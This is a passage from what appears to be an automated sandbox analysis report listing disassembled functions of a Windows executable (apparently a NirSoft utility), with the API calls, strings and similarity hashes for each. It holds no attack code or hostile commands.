                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                    Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                    • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                    • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
